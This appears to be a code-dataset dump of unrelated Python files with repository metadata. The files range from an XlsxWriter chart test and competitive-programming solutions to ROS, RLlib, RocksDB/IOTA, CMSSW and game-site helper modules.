# Copyright (c), 2013-2021, John McNamara, [email protected]
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_format07.xlsx')
def test_create_file(self):
"""Test the creation of an XlsxWriter file with chart formatting."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'line'})
chart.axis_ids = [46163840, 46175360]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5',
'marker': {
'type': 'square',
'size': 5,
'line': {'color': 'yellow'},
'fill': {'color': 'red'},
},
})
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$C$1:$C$5',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
|
[
"[email protected]"
] | |
35eada1e6e31e47d1156a2dd8c85c2aada530ebe
|
4fbd844113ec9d8c526d5f186274b40ad5502aa3
|
/algorithms/python3/pacific_atlantic_water_flow.py
|
6a5e0384ee2afe8a2dd84a801719431deeaa3b09
|
[] |
no_license
|
capric8416/leetcode
|
51f9bdc3fa26b010e8a1e8203a7e1bcd70ace9e1
|
503b2e303b10a455be9596c31975ee7973819a3c
|
refs/heads/master
| 2022-07-16T21:41:07.492706 | 2020-04-22T06:18:16 | 2020-04-22T06:18:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,244 |
py
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given an m x n matrix of non-negative integers representing the height of each unit cell in a continent, the "Pacific ocean" touches the left and top edges of the matrix and the "Atlantic ocean" touches the right and bottom edges.
Water can only flow in four directions (up, down, left, or right) from a cell to another one with height equal or lower.
Find the list of grid coordinates where water can flow to both the Pacific and Atlantic ocean.
Note:
The order of returned grid coordinates does not matter.
Both m and n are less than 150.
Example:
Given the following 5x5 matrix:
Pacific ~ ~ ~ ~ ~
~ 1 2 2 3 (5) *
~ 3 2 3 (4) (4) *
~ 2 4 (5) 3 1 *
~ (6) (7) 1 4 5 *
~ (5) 1 1 2 4 *
* * * * * Atlantic
Return:
[[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with parentheses in above matrix).
"""
""" ==================== body ==================== """
class Solution:
def pacificAtlantic(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
""" ==================== body ==================== """
|
[
"[email protected]"
] | |
39f51b8befba9f505afddabff3d6d21823fa7df5
|
adb759899204e61042225fabb64f6c1a55dac8ce
|
/1900~1999/1904.py
|
8a490e0cc71ac769e26193e2bc6f97c4d01e51cb
|
[] |
no_license
|
geneeol/baekjoon-online-judge
|
21cdffc7067481b29b18c09c9152135efc82c40d
|
2b359aa3f1c90f178d0c86ce71a0580b18adad6f
|
refs/heads/master
| 2023-03-28T23:25:12.219487 | 2021-04-01T09:19:06 | 2021-04-01T09:19:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,478 |
py
|
# 문제
# 지원이에게 2진 수열을 가르쳐 주기 위해, 지원이 아버지는 그에게 타일들을 선물해주셨다.
# 그리고 이 각각의 타일들은 0 또는 1이 쓰여 있는 낱장의 타일들이다.
# 어느 날 짓궂은 동주가 지원이의 공부를 방해하기 위해 0이 쓰여진 낱장의 타일들을 붙여서 한 쌍으로 이루어진 00 타일들을 만들었다.
# 결국 현재 1 하나만으로 이루어진 타일 또는 0타일을 두 개 붙인 한 쌍의 00타일들만이 남게 되었다.
# 그러므로 지원이는 타일로 더 이상 크기가 N인 모든 2진 수열을 만들 수 없게 되었다.
# 예를 들어, N=1일 때 1만 만들 수 있고, N=2일 때는 00, 11을 만들 수 있다. (01, 10은 만들 수 없게 되었다.)
# 또한 N=4일 때는 0011, 0000, 1001, 1100, 1111 등 총 5개의 2진 수열을 만들 수 있다.
# 우리의 목표는 N이 주어졌을 때 지원이가 만들 수 있는 모든 가짓수를 세는 것이다.
# 단 타일들은 무한히 많은 것으로 가정하자.
#
# 입력
# 첫 번째 줄에 자연수 N이 주어진다.(N ≤ 1,000,000)
#
# 출력
# 첫 번째 줄에 지원이가 만들 수 있는 길이가 N인 모든 2진 수열의 개수를 15746으로 나눈 나머지를 출력한다.
N = int(input())
MOD = 15746
dp = [0 for _ in range(1000001)]
dp[1], dp[2], dp[3] = 1, 2, 3
for i in range(4, 1000001):
dp[i] = (dp[i - 1] + dp[i - 2]) % MOD
print(dp[N])
|
[
"[email protected]"
] | |
bd0aee949be51e9122bd5c53c9a3f1bed2200067
|
1865a8508bed279961abaef324b434c0e3caa815
|
/setup.py
|
261fb583f89174f98ea47d3f5b9b3cadf5e81b6b
|
[
"MIT"
] |
permissive
|
zidarsk8/simple_wbd
|
de68cbefe94fda52ed5330ff55b97b4a73aedfb4
|
6c2d1611ffd70d3bf4468862b0b569131ef12d94
|
refs/heads/master
| 2021-01-19T10:54:38.824763 | 2016-08-16T03:58:42 | 2016-08-16T03:58:42 | 59,942,658 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,866 |
py
|
#!/usr/bin/env python3
"""Simplo wbd setup file.
This is the main setup for simple wbd. To manually install this module run:
$ pip install .
For development to keep track of the changes in the module and to include
development and test dependecies run:
$ pip install --editable .[dev,test]
"""
from setuptools import setup
def get_description():
with open("README.rst") as f:
return f.read()
if __name__ == "__main__":
setup(
name="simple_wbd",
version="0.5.1",
license="MIT",
author="Miha Zidar",
author_email="[email protected]",
description=("A simple python interface for World Bank Data Indicator "
"and Climate APIs"),
long_description=get_description(),
url="https://github.com/zidarsk8/simple_wbd",
download_url="https://github.com/zidarsk8/simple_wbd/tarball/0.5.1",
packages=["simple_wbd"],
provides=["simple_wbd"],
install_requires=[
"pycountry"
],
extras_require={
"dev": [
"pylint"
],
"test": [
"codecov",
"coverage",
"mock",
"nose",
"vcrpy",
],
},
test_suite="tests",
keywords = [
"World Bank Data",
"indicator api",
"climate api",
],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering",
],
)
|
[
"[email protected]"
] | |
e0d852a289aa3a8e3aca62072d98ba4f2cf26939
|
33524b5c049f934ce27fbf046db95799ac003385
|
/2018/Other/Urok_10_0_классы_объекты/teoriya_class_0.py
|
68f7a2ba67558f66e7e39854b191bc7d8ef21224
|
[] |
no_license
|
mgbo/My_Exercise
|
07b5f696d383b3b160262c5978ad645b46244b70
|
53fb175836717493e2c813ecb45c5d5e9d28dd23
|
refs/heads/master
| 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 758 |
py
|
from math import pi
class Circle:
def __init__(self, x=0, y=0, r=0):
self.x = x
self.y = y
self.r = r
def __str__(self):
return "({},{},{})".format(self.x,self.y,self.r)
def read(self):
self.x,self.y,self.r = map(int,input().split())
def area(self):
a = pi*self.r * self.r
return a
def perimetr(self):
return 2*pi*self.r
def zoom(self, k):
self.r *=k
def is_crossed(self, c): # пересекается или нет окружность с окружностью с?
d2 = (self.x - c.x)**2 + (self.y - c.y)**2
r2 =(self.r + c.r)**2
return d2 <=r2
c1 = Circle()
c2 = Circle()
'''
c1.r = 3
c2.r = 5
c2.x = 1
c2.y = 1
'''
c1.read()
c2.read()
print (c1)
print (c2)
'''
ans = c1.area()
print (ans)
'''
|
[
"[email protected]"
] | |
bbf5068fcd5c3270cf2448fddc69044e5fb04048
|
ddac7346ca9f1c1d61dfd7b3c70dc6cd076a9b49
|
/tests/test_calculators.py
|
ea4ae7c9ee767f607d8382ac221cc57272a8fee0
|
[
"MIT"
] |
permissive
|
gvenus/dftfit
|
f8cf5e9bef5a173ff0aa7202bacbfee0df61bd14
|
a00354f8f0d611bf57c6925f920c749d8628cf98
|
refs/heads/master
| 2023-03-17T18:58:52.287217 | 2019-10-20T04:07:44 | 2019-10-20T04:07:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,979 |
py
|
import asyncio
import shutil
import pymatgen as pmg
import numpy as np
import pytest
from dftfit.io.lammps import LammpsLocalDFTFITCalculator
from dftfit.io.lammps_cython import LammpsCythonDFTFITCalculator
from dftfit.cli.utils import load_filename
from dftfit.potential import Potential
@pytest.mark.pymatgen_lammps
@pytest.mark.lammps_cython
@pytest.mark.calculator
def test_calculator_equivalency(structure):
target_a = 4.1990858
s = structure('test_files/structure/MgO.cif')
lattice = pmg.Lattice.from_parameters(target_a, target_a, target_a, 90, 90, 90)
s.modify_lattice(lattice)
assert np.all(np.isclose(s.lattice.abc, (target_a, target_a, target_a)))
s = s * (2, 2, 2)
assert len(s) == 64
base_directory = 'test_files/dftfit_calculators/'
potential_schema = load_filename(base_directory + 'potential.yaml')
potential_schema['spec']['charge']['Mg']['initial'] = 1.4
potential_schema['spec']['charge']['O']['initial'] = -1.4
potential = Potential(potential_schema)
command = None
if shutil.which('lammps'): command = 'lammps'
elif shutil.which('lmp_serial'): command = 'lmp_serial'
calculators = [
LammpsLocalDFTFITCalculator(structures=[s], potential=potential, command=command, num_workers=1),
LammpsCythonDFTFITCalculator(structures=[s], potential=potential)
]
loop = asyncio.get_event_loop()
results = []
async def run(calc, potential):
await calc.create()
return await calc.submit(potential)
for calc in calculators:
results.append(loop.run_until_complete(run(calc, potential)))
assert len(results) == 2
assert len(results[0]) == 1
assert len(results[1]) == 1
for r1, r2 in zip(*results):
assert r1.structure == r2.structure
assert abs(r1.energy - r2.energy) < 1e-4
assert np.all(np.isclose(r1.forces, r2.forces, atol=1e-8))
assert np.all(np.isclose(r1.stress, r2.stress, atol=1e-8))
|
[
"[email protected]"
] | |
bde27465e5215f809b247a635fd24f3186193786
|
0698be34413debeb570e2560072c5696433acd81
|
/ForkTube/celeryconfig.py
|
1a437d56f6e0390a359e88338fe971e211e45e34
|
[] |
no_license
|
Miserlou/ForkTube
|
90a057c459fda4b8d92d94f89c9d86bf786549ca
|
848fdf4ff81c1d70b03c30a6382c8464dd4f25fe
|
refs/heads/master
| 2020-05-19T07:47:44.130888 | 2012-04-09T19:53:24 | 2012-04-09T19:53:24 | 2,363,212 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 184 |
py
|
BROKER_HOST = "localhost"
BROKER_PORT = 5672
BROKER_USER = "myuser"
BROKER_PASSWORD = "mypassword"
BROKER_VHOST = "myvhost"
CELERY_RESULT_BACKEND = "amqp"
CELERY_IMPORTS = ("tasks", )
|
[
"[email protected]"
] | |
38bae379c04d24789026484a687ef0293b07e1f4
|
d346c1e694e376c303f1b55808d90429a1ad3c3a
|
/medium/61.rotate_list.py
|
86f5af201842b8ba886e5132edcc3439263c61a5
|
[] |
no_license
|
littleliona/leetcode
|
3d06bc27c0ef59b863a2119cd5222dc94ed57b56
|
789d8d5c9cfd90b872be4a4c35a34a766d95f282
|
refs/heads/master
| 2021-01-19T11:52:11.938391 | 2018-02-19T03:01:47 | 2018-02-19T03:01:47 | 88,000,832 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,234 |
py
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
#
current = head
storeList = []
while current != None:
storeList.append(current)
current = current.next
if len(storeList) <= 1:
return head
k = k % len(storeList)
if k == 0:
return head
res = storeList[-k]
storeList[-k - 1].next = None
storeList[-1].next = head
return res
#mine
if not head or not head.next or k == 0:
return head
length_list = 1
current = head
while current.next:
current = current.next
length_list += 1
current.next = head
current = head
for i in range(1,length_list - (k % length_list)):
current = current.next
head = current.next
current.next = None
return head
s = Solution()
a = s.threeSum([-1,0,1,2,-1,-4])
print(a)
|
[
"[email protected]"
] | |
3610918d2b73d9d7fb9529196d9121b89800d8c4
|
03901933adfaa9130979b36f1e42fb67b1e9f850
|
/iotapy/storage/providers/rocksdb.py
|
a1b6d630c97ebda8f54229ab370820ab8f9b63f1
|
[
"MIT"
] |
permissive
|
aliciawyy/iota-python
|
03418a451b0153a1c55b3951d18d4cb533c7ff28
|
b8d421acf94ccd9e7374f799fbe496f6d23e3cf3
|
refs/heads/master
| 2020-03-19T04:15:54.594313 | 2018-06-04T18:26:52 | 2018-06-04T18:26:52 | 135,811,581 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,363 |
py
|
# -*- coding: utf-8 -*-
import struct
import iota
import rocksdb_iota
import iotapy.storage.providers.types
from rocksdb_iota.merge_operators import StringAppendOperator
from iotapy.storage import converter
KB = 1024
MB = KB * 1024
MERGED = ['tag', 'bundle', 'approvee', 'address', 'state_diff']
class RocksDBProvider:
BLOOM_FILTER_BITS_PER_KEY = 10
column_family_names = [
b'default',
b'transaction',
b'transaction-metadata',
b'milestone',
b'stateDiff',
b'address',
b'approvee',
b'bundle',
b'tag'
]
column_family_python_mapping = {
'transaction_metadata': 'transaction-metadata',
'state_diff': 'stateDiff'
}
def __init__(self, db_path, db_log_path, cache_size=4096, read_only=True):
self.db = None
self.db_path = db_path
self.db_log_path = db_log_path
self.cache_size = cache_size
self.read_only = read_only
self.available = False
def init(self):
self.init_db(self.db_path, self.db_log_path)
self.available = True
def init_db(self, db_path, db_log_path):
options = rocksdb_iota.Options(
create_if_missing=True,
db_log_dir=db_log_path,
max_log_file_size=MB,
max_manifest_file_size=MB,
max_open_files=10000,
max_background_compactions=1
)
options.allow_concurrent_memtable_write = True
# XXX: How to use this?
block_based_table_config = rocksdb_iota.BlockBasedTableFactory(
filter_policy=rocksdb_iota.BloomFilterPolicy(self.BLOOM_FILTER_BITS_PER_KEY),
block_size_deviation=10,
block_restart_interval=16,
block_cache=rocksdb_iota.LRUCache(self.cache_size * KB),
block_cache_compressed=rocksdb_iota.LRUCache(32 * KB, shard_bits=10))
options.table_factory = block_based_table_config
# XXX: How to use this?
column_family_options = rocksdb_iota.ColumnFamilyOptions(
merge_operator=StringAppendOperator(),
table_factory=block_based_table_config,
max_write_buffer_number=2,
write_buffer_size=2 * MB)
try:
self.db = rocksdb_iota.DB(
self.db_path, options, self.column_family_names,
read_only=self.read_only)
except rocksdb_iota.errors.InvalidArgument as e:
if 'Column family not found' in str(e):
# Currently, rocksdb_iota didn't support
# "create_if_column_family_missing" option, if we detect this
# is a new database, we will need to create its whole
# column family manually.
self.db = rocksdb_iota.DB(
self.db_path, options, [b'default'], read_only=self.read_only)
# Skip to create b'default'
for column_family in self.column_family_names[1:]:
self.db.create_column_family(column_family)
else:
raise e
def _convert_column_to_handler(self, column):
if not isinstance(column, str):
raise TypeError('Column type should be str')
db_column = self.column_family_python_mapping.get(column, column)
ch = self.db.column_family_handles.get(bytes(db_column, 'ascii'))
if ch is None:
raise KeyError('Invalid column family name: %s' % (column))
return ch
def _convert_key_column(self, key, column):
# Convert column to column family handler
ch = self._convert_column_to_handler(column)
# Expand iota.Tag to iota.Hash
if column == 'tag':
if not isinstance(key, iota.Tag):
raise TypeError('Tag key type should be iota.Tag')
key = iota.Hash(str(key))
# Convert key into trits-binary
if column == 'milestone':
if not isinstance(key, int):
raise TypeError('Milestone key type should be int')
key = struct.pack('>l', key)
else:
if not isinstance(key, iota.TryteString):
raise TypeError('Key type should be iota.TryteString')
if len(key) != iota.Hash.LEN:
raise ValueError('Key length must be 81 trytes')
key = converter.from_trits_to_binary(key.as_trits())
return key, ch
def _get(self, key, bytes_, column):
# Convert value (bytes_) into data object
obj = getattr(iotapy.storage.providers.types, column).get(bytes_, key)
# Handle metadata
if obj and key and column == 'transaction':
obj.set_metadata(self.get(key, 'transaction_metadata'))
return obj
def _get_key(self, bytes_, column):
return getattr(iotapy.storage.providers.types, column).get_key(bytes_)
def _save(self, value, column):
# Convert value to bytes
return getattr(iotapy.storage.providers.types, column).save(value)
def get(self, key, column):
k, ch = self._convert_key_column(key, column)
# Get binary data from database
bytes_ = self.db.get(k, ch)
return self._get(key, bytes_, column)
def next(self, key, column):
key, ch = self._convert_key_column(key, column)
it = self.db.iteritems(ch)
it.seek(key)
next(it)
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def first(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_first()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def latest(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_last()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def may_exist(self, key, column, fetch=False):
key, ch = self._convert_key_column(key, column)
# XXX: Not working......
return self.db.key_may_exist(key, ch)[0]
def save(self, key, value, column):
key, ch = self._convert_key_column(key, column)
value = self._save(value, column)
self.db.put(key, value, ch)
def store(self, key, value, column):
# Store is different then save, currently deailing with transaction
# that transaction will save more data to other column
batches = getattr(iotapy.storage.providers.types, column).store(key, value)
write_batch = rocksdb_iota.WriteBatch()
for k, v, column in batches:
k, ch = self._convert_key_column(k, column)
v = self._save(v, column)
if column in MERGED:
write_batch.merge(k, v, ch)
else:
write_batch.put(k, v, ch)
self.db.write(write_batch)
|
[
"[email protected]"
] | |
710f90e901aebc0be4d31eed525c04c01665c3e0
|
3ad6d731c994813a10801829c45f56c58ff9021d
|
/src/teleop_bot/src/keys_to_twist_with_ramps.py
|
f8bf0f492753a4cd8e20f5fa2477366b8f82f090
|
[] |
no_license
|
bladesaber/ROS_tutorial
|
9b4ae5a9a1bd773ae48d836a87d08bde8a757a5d
|
63486048786ebc864bc731eb1b524a72e9267738
|
refs/heads/master
| 2022-11-16T07:36:15.938433 | 2020-07-07T02:47:50 | 2020-07-07T02:47:50 | 277,693,692 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,584 |
py
|
#!/usr/bin/env python
import rospy
import math
from std_msgs.msg import String
from geometry_msgs.msg import Twist
key_mapping = { 'w': [ 0, 1], 'x': [ 0, -1],
'a': [ 1, 0], 'd': [-1, 0],
's': [ 0, 0] }
g_twist_pub = None
g_target_twist = None
g_last_twist = None
g_last_send_time = None
g_vel_scales = [0.1, 0.1] # default to very slow
g_vel_ramps = [1, 1] # units: meters per second^2
def ramped_vel(v_prev, v_target, t_prev, t_now, ramp_rate):
# compute maximum velocity step
step = ramp_rate * (t_now - t_prev).to_sec()
sign = 1.0 if (v_target > v_prev) else -1.0
error = math.fabs(v_target - v_prev)
if error < step: # we can get there within this timestep. we're done.
return v_target
else:
return v_prev + sign * step # take a step towards the target
def ramped_twist(prev, target, t_prev, t_now, ramps):
tw = Twist()
tw.angular.z = ramped_vel(prev.angular.z, target.angular.z, t_prev,
t_now, ramps[0])
tw.linear.x = ramped_vel(prev.linear.x, target.linear.x, t_prev,
t_now, ramps[1])
return tw
def send_twist():
global g_last_twist_send_time, g_target_twist, g_last_twist,\
g_vel_scales, g_vel_ramps, g_twist_pub
t_now = rospy.Time.now()
g_last_twist = ramped_twist(g_last_twist, g_target_twist,
g_last_twist_send_time, t_now, g_vel_ramps)
g_last_twist_send_time = t_now
g_twist_pub.publish(g_last_twist)
def keys_cb(msg):
global g_target_twist, g_last_twist, g_vel_scales
if len(msg.data) == 0 or not key_mapping.has_key(msg.data[0]):
return # unknown key.
vels = key_mapping[msg.data[0]]
g_target_twist.angular.z = vels[0] * g_vel_scales[0]
g_target_twist.linear.x = vels[1] * g_vel_scales[1]
def fetch_param(name, default):
if rospy.has_param(name):
return rospy.get_param(name)
else:
print "parameter [%s] not defined. Defaulting to %.3f" % (name, default)
return default
if __name__ == '__main__':
rospy.init_node('keys_to_twist')
g_last_twist_send_time = rospy.Time.now()
g_twist_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
rospy.Subscriber('keys', String, keys_cb)
g_target_twist = Twist() # initializes to zero
g_last_twist = Twist()
g_vel_scales[0] = fetch_param('~angular_scale', 0.1)
g_vel_scales[1] = fetch_param('~linear_scale', 0.1)
g_vel_ramps[0] = fetch_param('~angular_accel', 1.0)
g_vel_ramps[1] = fetch_param('~linear_accel', 1.0)
rate = rospy.Rate(20)
while not rospy.is_shutdown():
send_twist()
rate.sleep()
|
[
"[email protected]"
] | |
73fe66859a65e73496b91d800a11f82a54258308
|
a85419f08198548eb6ba4d3df0d181769f810358
|
/C_Carray/split_for_singlechannel_tests.py
|
4887feeda442f244c49cc385774a1b017c5a6ddf
|
[] |
no_license
|
keflavich/w51evlareductionscripts
|
cd0287d750d938bab96f1a7d335b3b84c27a987f
|
00cb8085e8fe5c047f53852c8057a1f7457863f6
|
refs/heads/master
| 2021-01-17T07:26:01.574220 | 2016-07-07T09:02:26 | 2016-07-07T09:02:26 | 8,590,805 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 650 |
py
|
# June 29, 2015
# Instead, use h2co_cvel_split in ../C_AC
# outputvis_A = 'h2co11_Cband_Aarray_nocal_20to100kms.ms'
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_20kms_onechan.ms',
# spw='0:0', width=1)
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_57kms_onechan.ms',
# spw='0:74', width=1)
# outputvis_C = 'h2co11_Cband_Carray_nocal_20to100kms.ms'
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_20kms_onechan.ms',
# spw='0:0', width=1, datacolumn='data')
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_57kms_onechan.ms',
# spw='0:74', width=1, datacolumn='data')
|
[
"[email protected]"
] | |
2e5daa13e1b08a262d40a179079d7d11029e9af2
|
5a0d6fff86846117420a776e19ca79649d1748e1
|
/rllib_exercises/serving/do_rollouts.py
|
d2dff98d01aa7e23c66a2e98eb958ee472389934
|
[] |
no_license
|
ray-project/tutorial
|
d823bafa579fca7eeb3050b0a13c01a542b6994e
|
08f4f01fc3e918c997c971f7b2421551f054c851
|
refs/heads/master
| 2023-08-29T08:46:38.473513 | 2022-03-21T20:43:22 | 2022-03-21T20:43:22 | 89,322,668 | 838 | 247 | null | 2022-03-21T20:43:22 | 2017-04-25T05:55:26 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,596 |
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import argparse
import gym
from ray.rllib.utils.policy_client import PolicyClient
parser = argparse.ArgumentParser()
parser.add_argument(
"--no-train", action="store_true", help="Whether to disable training.")
parser.add_argument(
"--off-policy",
action="store_true",
help="Whether to take random instead of on-policy actions.")
if __name__ == "__main__":
args = parser.parse_args()
import pong_py
env = pong_py.PongJSEnv()
client = PolicyClient("http://localhost:8900")
eid = client.start_episode(training_enabled=not args.no_train)
obs = env.reset()
rewards = 0
episode = []
f = open("out.txt", "w")
while True:
if args.off_policy:
action = env.action_space.sample()
client.log_action(eid, obs, action)
else:
action = client.get_action(eid, obs)
next_obs, reward, done, info = env.step(action)
episode.append({
"obs": obs.tolist(),
"action": float(action),
"reward": reward,
})
obs = next_obs
rewards += reward
client.log_returns(eid, reward, info=info)
if done:
print("Total reward:", rewards)
f.write(json.dumps(episode))
f.write("\n")
f.flush()
rewards = 0
client.end_episode(eid, obs)
obs = env.reset()
eid = client.start_episode(training_enabled=not args.no_train)
|
[
"[email protected]"
] | |
15701489ab41edd41261b2b31779b163a468529e
|
44a2741832c8ca67c8e42c17a82dbe23a283428d
|
/cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/akVs3CaloJetSequence_pPb_mix_cff.py
|
3d77c27baa5beb48450caf86750981f27c601170
|
[] |
no_license
|
yenjie/HIGenerator
|
9ff00b3f98b245f375fbd1b565560fba50749344
|
28622c10395af795b2b5b1fecf42e9f6d4e26f2a
|
refs/heads/master
| 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,519 |
py
|
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
akVs3Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("ak3HiGenJetsCleaned")
)
akVs3Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
akVs3Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akVs3CaloJets"),
payload = "AKVs3Calo_HI"
)
akVs3CalopatJets = patJets.clone(jetSource = cms.InputTag("akVs3CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akVs3Calocorr")),
genJetMatch = cms.InputTag("akVs3Calomatch"),
genPartonMatch = cms.InputTag("akVs3Caloparton"),
jetIDMap = cms.InputTag("akVs3CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
akVs3CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akVs3CalopatJets"),
genjetTag = 'ak3HiGenJetsCleaned',
rParam = 0.3,
matchJets = cms.untracked.bool(True),
matchTag = 'akPu3CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
akVs3CaloJetSequence_mc = cms.Sequence(
akVs3Calomatch
*
akVs3Caloparton
*
akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_data = cms.Sequence(akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_jec = akVs3CaloJetSequence_mc
akVs3CaloJetSequence_mix = akVs3CaloJetSequence_mc
akVs3CaloJetSequence = cms.Sequence(akVs3CaloJetSequence_mix)
|
[
"[email protected]"
] | |
8f8199b6e1f6dfc54c783f31a9ee7c30b7a68a8b
|
86c082438a001ba48617aa756439b34423387b40
|
/src/the_tale/the_tale/accounts/jinjaglobals.py
|
a2404ff781af031fd621d00f6e3091150a03094c
|
[
"BSD-3-Clause"
] |
permissive
|
lustfullyCake/the-tale
|
a6c02e01ac9c72a48759716dcbff42da07a154ab
|
128885ade38c392535f714e0a82fb5a96e760f6d
|
refs/heads/master
| 2020-03-27T21:50:56.668093 | 2018-06-10T17:39:48 | 2018-06-10T17:39:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,295 |
py
|
# coding: utf-8
from dext.common.utils import jinja2
from the_tale.accounts import logic
from the_tale.accounts import conf
@jinja2.jinjaglobal
def login_page_url(next_url='/'):
return jinja2.Markup(logic.login_page_url(next_url))
@jinja2.jinjaglobal
def login_url(next_url='/'):
return jinja2.Markup(logic.login_url(next_url))
@jinja2.jinjaglobal
def logout_url():
return jinja2.Markup(logic.logout_url())
@jinja2.jinjaglobal
def forum_complaint_theme():
return conf.accounts_settings.FORUM_COMPLAINT_THEME
@jinja2.jinjaglobal
def account_sidebar(user_account, page_account, page_caption, page_type, can_moderate=False):
from the_tale.forum.models import Thread
from the_tale.game.bills.prototypes import BillPrototype
from the_tale.linguistics.prototypes import ContributionPrototype
from the_tale.linguistics.relations import CONTRIBUTION_TYPE
from the_tale.accounts.friends.prototypes import FriendshipPrototype
from the_tale.accounts.clans.logic import ClanInfo
from the_tale.blogs.models import Post as BlogPost, POST_STATE as BLOG_POST_STATE
bills_count = BillPrototype.accepted_bills_count(page_account.id)
threads_count = Thread.objects.filter(author=page_account._model).count()
threads_with_posts = Thread.objects.filter(post__author=page_account._model).distinct().count()
templates_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.TEMPLATE).count()
words_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.WORD).count()
folclor_posts_count = BlogPost.objects.filter(author=page_account._model, state=BLOG_POST_STATE.ACCEPTED).count()
friendship = FriendshipPrototype.get_for_bidirectional(user_account, page_account)
return jinja2.Markup(jinja2.render('accounts/sidebar.html',
context={'user_account': user_account,
'page_account': page_account,
'page_caption': page_caption,
'master_clan_info': ClanInfo(page_account),
'own_clan_info': ClanInfo(user_account),
'friendship': friendship,
'bills_count': bills_count,
'templates_count': templates_count,
'words_count': words_count,
'folclor_posts_count': folclor_posts_count,
'threads_count': threads_count,
'threads_with_posts': threads_with_posts,
'can_moderate': can_moderate,
'page_type': page_type,
'commission': conf.accounts_settings.MONEY_SEND_COMMISSION}))
|
[
"[email protected]"
] | |
3f0d333958350a92ac434aa6a8017a17d263453d
|
2d929ed82d53e7d70db999753c60816ed00af171
|
